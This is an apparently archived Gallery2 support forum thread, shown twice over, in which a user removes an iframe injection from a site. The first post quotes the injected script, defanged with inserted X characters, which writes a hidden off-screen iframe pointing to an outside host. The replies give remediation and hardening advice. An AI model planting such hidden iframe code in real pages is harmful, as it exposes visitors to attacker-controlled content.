iframe virus removal [SOLVED]

ycc

Joined: 2008-08-18
Posts: 25

Posted: Sun, 2010-05-16 15:55

I am sorry I cannot provide all information asked for. My webhosting service has got iframe-injection problems and I cannot reach my site. I use Gallery2.

When I surf to my site, Avast antivirus says "permission denied due to iframe virus in main.php"

When I turn off Avast and save the main page, it starts like this (iframe virus included)

(I inserted some X to disable possible html interpretation.)

< X !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
< X html lang="en-US">< X head>< X script> X document.write('< X iframe src="http://hulmeux.com/?click=18790379" width=100 height=100 style="position:absolute;top:-10000;left:-10000;">< X /iframe>');< X /script>< X link rel="stylesheet" type="text/css" href="main.php_files/main.css">

However, when I download main.php with ftp, I cannot find the virus. I have tried searching for it, but i am not very good with Vista search functions. My impression is also that the virus may be hidden and not easy to search for.

Please tell me in which file the virus is located so i can correct it and upload. Or please give alternative method for iframe virus removal.

Thanks

suprsidr

Joined: 2005-04-17
Posts: 8339

Posted: Sun, 2010-05-16 16:18

http://codex.gallery2.org/Gallery2:FAQ#How_can_I_make_sure_that_my_installation_files_are_all_intact.3F

-s
FlashYourWeb and Your Gallery with The E2 XML Media Player for Gallery2

ycc

Joined: 2008-08-18
Posts: 25

Posted: Sun, 2010-05-16 16:39

Thanks a million and a million more to suprsidr and this forum.

I followed the link posted:
http://www.example.com/gallery/upgrade/index.php

It gave six files as being modified, the one I had missed was in lib/smarty

install/index.php
lib/smarty/plugins/modifier.default.php
lib/support/index.php
upgrade/index.php
modules/rewrite/data/path_info/index.php
themes/matrix/templates/theme.tpl

Now I can surf my site with antivirus program turned on.

No time to write more, must continue to read the FAQ ... ;)

Thread solved.

nivekiam

Joined: 2002-12-10
Posts: 16504

Posted: Sun, 2010-05-16 21:16

CHANGE YOUR PASSWORDS. Most importantly the password you use for FTP and DO NOT USE FTP. Use SFTP. Using plain FTP means that your user name and password are sent in clear text and this is actually how a large majority of sites are hacked. NEVER use FTP or Telnet. SFTP (secure ftp) or SSH only, ever.

Also, make sure you are running the latest version of any software on your site, WordPress (known for many, many vulnerabilities and another major way sites get hacked), G2 (should be running 2.3.1), etc.

I'd read through this too:
http://codex.gallery2.org/Gallery2:How_do_I_secure_Gallery2

http://codex.gallery2.org/Gallery2:Security

A lot of that applies to any web based application you run on a site.
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

ycc

Joined: 2008-08-18
Posts: 25

Posted: Mon, 2010-05-17 07:42

nivekiam

Thanks for suggestions.

I do not know if GoDaddy offers SFTP, I will have to check. I just have a rather simple "Linux deluxe hosting" account. (Not so advanced, in spite of its name, but price and service is OK. No SSH, though)

nivekiam

Joined: 2002-12-10
Posts: 16504

Posted: Mon, 2010-05-17 14:13

GoDaddy sucks. They run really old software on their servers (Apache 1.x for example) with no apparent plans on upgrading. If they don't offer secure access like SFTP at the very least then it shows even more how little they care about security or their customers and all they care about is getting a monthly payment from them.

www.pairlite.com A little bit more per month but way better service. I have other suggestions too.
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

ycc

Joined: 2008-08-18
Posts: 25

Posted: Thu, 2010-05-20 10:14

The suggestion to tighten up the file transfer procedures is naturally a good one, thanks.

How the iframes got injected this time I am not sure about. However, during one short period iframes were written into many files at my hosting account. (Mostly by the name of index.htm, index.php and some files with "main" their name). I wrote and complained to the hosting company and got general antivirus guidelines back.

The problem then suddenly disappeared and I could gradually remove the iframes. (The last one by help in this thread.) At that time I hadn't yet changed my ftp password. My impression was that someone working at the hosting company (or otherwise having the right to run executables) had been infected by an executable program that wrote iframes into indexfiles. They then took care of the problem and it has fortunately not reappeared.

ycc Joined: 2008-08-18 Posts: 25	Posted: Sun, 2010-05-16 15:55
	I am sorry I cannot provide all information asked for. My webhosting service has got iframe-injection problems and I cannot reach my site. I use Gallery2. When I surf to my site, Avast antivirus says "permission denied due to iframe virus in main.php" When I turn off Avast and save the main page, it starts like this (iframe virus included) (I inserted some X to disable possible html interpretation.) < X !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> < X html lang="en-US">< X head>< X script> X document.write('< X iframe src="http://hulmeux.com/?click=18790379" width=100 height=100 style="position:absolute;top:-10000;left:-10000;">< X /iframe>');< X /script>< X link rel="stylesheet" type="text/css" href="main.php_files/main.css"> However, when I download main.php with ftp, I cannot find the virus. I have tried searching for it, but i am not very good with Vista search functions. My impression is also that the virus may be hidden and not easy to search for. Please tell me in which file the virus is located so i can correct it and upload. Or please give alternative method for iframe virus removal. Thanks
	XUser login Username: * Password: * Create new account Request new password
suprsidr Joined: 2005-04-17 Posts: 8339	Posted: Sun, 2010-05-16 16:18
	http://codex.gallery2.org/Gallery2:FAQ#How_can_I_make_sure_that_my_installation_files_are_all_intact.3F -s FlashYourWeb and Your Gallery with The E2 XML Media Player for Gallery2

ycc Joined: 2008-08-18 Posts: 25	Posted: Sun, 2010-05-16 16:39
	Thanks a million and a million more to suprsidr and this forum. I followed the link posted: http://www.example.com/gallery/upgrade/index.php It gave six files as being modified, the one I had missed was in lib/smarty install/index.php lib/smarty/plugins/modifier.default.php lib/support/index.php upgrade/index.php modules/rewrite/data/path_info/index.php themes/matrix/templates/theme.tpl Now I can surf my site with antivirus program turned on. No time to write more, must continue to read the FAQ ... ;) Thread solved.

nivekiam Joined: 2002-12-10 Posts: 16504	Posted: Sun, 2010-05-16 21:16
	CHANGE YOUR PASSWORDS. Most importantly the password you use for FTP and DO NOT USE FTP. Use SFTP. Using plain FTP means that your user name and password are sent in clear text and this is actually how a large majority of sites are hacked. NEVER use FTP or Telnet. SFTP (secure ftp) or SSH only, ever. Also, make sure you are running the latest version of any software on your site, WordPress (known for many, many vulnerabilities and another major way sites get hacked), G2 (should be running 2.3.1), etc. I'd read through this too: http://codex.gallery2.org/Gallery2:How_do_I_secure_Gallery2 http://codex.gallery2.org/Gallery2:Security A lot of that applies to any web based application you run on a site. ____________________________________________ Like Gallery? Like the support? Donate now!!! See G2 live here

ycc Joined: 2008-08-18 Posts: 25	Posted: Mon, 2010-05-17 07:42
	nivekiam Thanks for suggestions. I do not know if GoDaddy offers SFTP, I will have to check. I just have a rather simple "Linux deluxe hosting" account. (Not so advanced, in spite of its name, but price and service is OK. No SSH, though)

nivekiam Joined: 2002-12-10 Posts: 16504	Posted: Mon, 2010-05-17 14:13
	GoDaddy sucks. They run really old software on their servers (Apache 1.x for example) with no apparent plans on upgrading. If they don't offer secure access like SFTP at the very least then it shows even more how little they care about security or their customers and all they care about is getting a monthly payment from them. www.pairlite.com A little bit more per month but way better service. I have other suggestions too. ____________________________________________ Like Gallery? Like the support? Donate now!!! See G2 live here

ycc Joined: 2008-08-18 Posts: 25	Posted: Thu, 2010-05-20 10:14
	The suggestion to tighten up the file transfer procedures is naturally a good one, thanks. How the iframes got injected this time I am not sure about. However, during one short period iframes were written into many files at my hosting account. (Mostly by the name of index.htm, index.php and some files with "main" their name). I wrote and complained to the hosting company and got general antivirus guidelines back. The problem then suddenly disappeared and I could gradually remove the iframes. (The last one by help in this thread.) At that time I hadn't yet changed my ftp password. My impression was that someone working at the hosting company (or otherwise having the right to run executables) had been infected by an executable program that wrote iframes into indexfiles. They then took care of the problem and it has fortunately not reappeared.

iframe virus removal [SOLVED]

XUser login